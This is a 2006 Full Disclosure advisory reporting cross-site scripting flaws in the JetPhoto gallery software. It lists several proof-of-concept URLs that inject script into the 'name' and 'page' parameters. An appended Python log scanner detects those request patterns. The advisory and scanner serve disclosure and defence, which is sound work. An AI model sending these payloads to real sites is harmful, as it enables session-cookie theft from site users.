Full Disclosure mailing list archives
JetPhoto Multiple Cross-Site Scripting Vulnerabilities
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail com>
Date: Mon, 10 Apr 2006 20:52:08 -0500
###########################################################################
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilities
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus () diosdelared com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendor Url: http://www.jetphotosoft.com
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#the affected system causing the robbery of cookies
#
#Example XSS:
##################################################################
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert( document.cookie);</script>
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
#all
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus () diosdelared com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
# original advisory: http://www.elitemexico.org/11.txt
##################################################################
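
A log check for the request patterns listed in the advisory, added here as an example (it is not part of the original post or of JetPhoto): it flags requests to the named view scripts whose `name` or `page` parameter decodes to markup characters. The sample log lines, the `/album/` install path and the rule that `page` should be numeric are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# View scripts and parameters named in the advisory (any "*.view" theme directory).
ENDPOINT = re.compile(r"/view/[^/]+\.view/(?:thumbnail|gallery|detail|slideshow)\.php$", re.I)
PARAMS = ("name", "page")
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, made-up /album/ install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2006:20:40:01 -0500] "GET /album/view/Classic.view/thumbnail.php?name=webalbum&page=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Apr/2006:20:41:12 -0500] "GET /album/view/Classic.view/gallery.php?name=JetPhoto_Album&page=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E HTTP/1.1" 200 4876',
    '198.51.100.7 - - [10/Apr/2006:20:41:30 -0500] "GET /album/view/Orange.view/slideshow.php?name=%253Cscript%253E HTTP/1.1" 200 3011',
    '192.0.2.44 - - [10/Apr/2006:20:42:05 -0500] "GET /index.php?page=%3Cb%3E HTTP/1.1" 404 210',
    '192.0.2.44 - - [10/Apr/2006:20:43:19 -0500] "GET /album/view/Orange.view/detail.php?name=1&page=abc HTTP/1.1" 200 2980',
]

def decode(value, rounds=3):
    """Undo up to `rounds` extra layers of URL encoding before inspecting a value."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def suspicious_params(target):
    """Return (param, reason) findings for one request target; [] if clean or out of scope."""
    parts = urlsplit(target)
    if not ENDPOINT.search(parts.path):
        return []
    findings = []
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in map(decode, values if param in PARAMS else []):
            if MARKUP.search(value):
                findings.append((param, "markup characters"))
            elif param == "page" and not value.isdigit():  # assumption: page is a number
                findings.append((param, "non-numeric page"))
    return findings

def scan(log_lines):
    """Return (line_number, param, reason) for every finding in an access log."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        for finding in suspicious_params(match.group(1)) if match else []:
            hits.append((number, *finding))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The quote characters in `MARKUP` can also match legitimate album names containing an apostrophe, so treat hits on `name` as leads to review rather than confirmed attempts.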